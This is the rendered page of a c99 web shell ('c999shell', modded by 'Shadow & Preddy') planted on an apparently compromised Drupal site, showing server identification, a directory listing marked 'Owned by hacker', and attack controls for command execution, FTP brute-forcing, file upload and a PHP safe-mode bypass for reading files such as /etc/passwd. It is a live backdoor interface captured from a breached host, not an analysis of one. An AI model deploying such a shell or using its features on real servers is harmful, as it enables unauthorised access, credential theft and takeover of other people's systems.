!c99Shell v. 1.0 pre-release build #16!

Software: Apache. PHP/5.2.17 

uname -a: Linux server.digitalaidhosting.org 2.6.18-348.16.1.el5 #1 SMP Wed Aug 21 04:00:25 EDT 2013
x86_64
 

uid=99(nobody) gid=99(nobody) groups=99(nobody) 

Safe-mode: OFF (not secure)

/home/move/public_html/   drwxr-x---
Free 169.57 GB of 472.99 GB (35.85%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Owned by hacker

Listing folder (26 files and 9 folders):

NameAsc. Size Modify Owner/Group Perms Action
 .. LINK 31.08.2015 19:16:52 move/move drwx--x--x Info 
 . LINK 29.07.2015 22:08:25 move/nobody drwxr-x--- Info 
 [misc] DIR 29.07.2015 08:49:28 move/move drwxr-xr-x Info 
 [modules] DIR 29.07.2015 08:49:40 move/move drwxr-xr-x Info 
 [themes] DIR 29.07.2015 08:49:41 move/move drwxr-xr-x Info 
 [scripts] DIR 29.07.2015 08:49:27 move/move drwxr-xr-x Info 
 [.git] DIR 29.07.2015 08:49:25 move/move drwxr-xr-x Info 
 [includes] DIR 29.07.2015 08:40:35 move/move drwxr-xr-x Info 
 [sites] DIR 29.07.2015 08:41:16 move/move drwxr-xr-x Info 
 [profiles] DIR 29.07.2015 08:45:34 move/move drwxr-xr-x Info 
 [cgi-bin] DIR 27.05.2015 16:44:26 move/move drwxr-xr-x Info 
 web.config 2 KB 29.07.2015 08:45:35 move/move -rw-r--r-- Info Change Download 
 field_delete_field_inactive-943772-167_0.patch 15.83 KB 29.07.2015 08:49:26 move/move -rw-r--r-- Info Change Download 
 install.php 688 B 29.07.2015 08:45:35 move/move -rw-r--r-- Info Change Download 
 .htaccess 5.05 KB 26.09.2013 11:25:29 move/move -rw-r--r-- Info Change Download 
 INSTALL.sqlite.txt 1.27 KB 29.07.2015 08:45:35 move/move -rw-r--r-- Info Change Download 
 COPYRIGHT.txt 1.45 KB 29.07.2015 08:49:26 move/move -rw-r--r-- Info Change Download 
 index.html.bak 563 B 01.07.2015 04:15:27 move/move -rw-r--r-- Info Change Download 
 index.php 529 B 29.07.2015 08:49:40 move/move -rw-r--r-- Info Change Download 
 INSTALL.pgsql.txt 1.83 KB 29.07.2015 08:49:40 move/move -rw-r--r-- Info Change Download 
 CHANGELOG.txt 69.04 KB 29.07.2015 08:49:27 move/move -rw-r--r-- Info Change Download 
 error_log 6.4 KB 29.07.2015 08:49:27 move/move -rw-r--r-- Info Change Download 
 .gitignore 200 B 29.07.2015 08:49:26 move/move -rw-rw-r-- Info Change Download 
 update.php 18.96 KB 29.07.2015 08:45:34 move/move -rw-r--r-- Info Change Download 
 maps?file=api 272 B 29.07.2015 08:45:34 move/move -rw-rw-r-- Info Change Download 
 INSTALL.txt 17.44 KB 29.07.2015 08:40:34 move/move -rw-r--r-- Info Change Download 
 MAINTAINERS.txt 8.2 KB 29.07.2015 08:40:34 move/move -rw-r--r-- Info Change Download 
 LICENSE.txt 17.67 KB 29.07.2015 08:40:34 move/move -rw-rw-r-- Info Change Download 
 cron.php 720 B 29.07.2015 08:40:33 move/move -rw-r--r-- Info Change Download 
 robots.txt 1.52 KB 29.07.2015 08:40:33 move/move -rw-r--r-- Info Change Download 
 INSTALL.mysql.txt 1.42 KB 29.07.2015 08:40:34 move/move -rw-r--r-- Info Change Download 
 README.txt 3.41 KB 29.07.2015 08:40:34 move/move -rw-r--r-- Info Change Download 
 xmlrpc.php 417 B 29.07.2015 08:45:34 move/move -rw-r--r-- Info Change Download 
 UPGRADE.txt 9.42 KB 29.07.2015 08:40:35 move/move -rw-r--r-- Info Change Download 
 info.php.bak 133 B 29.07.2015 08:40:35 move/move -rw-rw-r-- Info Change Download 
 authorize.php 6.4 KB 29.07.2015 08:40:34 move/move -rw-r--r-- Info Change Download 
 info 22.93 KB 29.07.2015 08:40:33 move/move -rw-r--r-- Info Change Download 

    


:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0139 ]--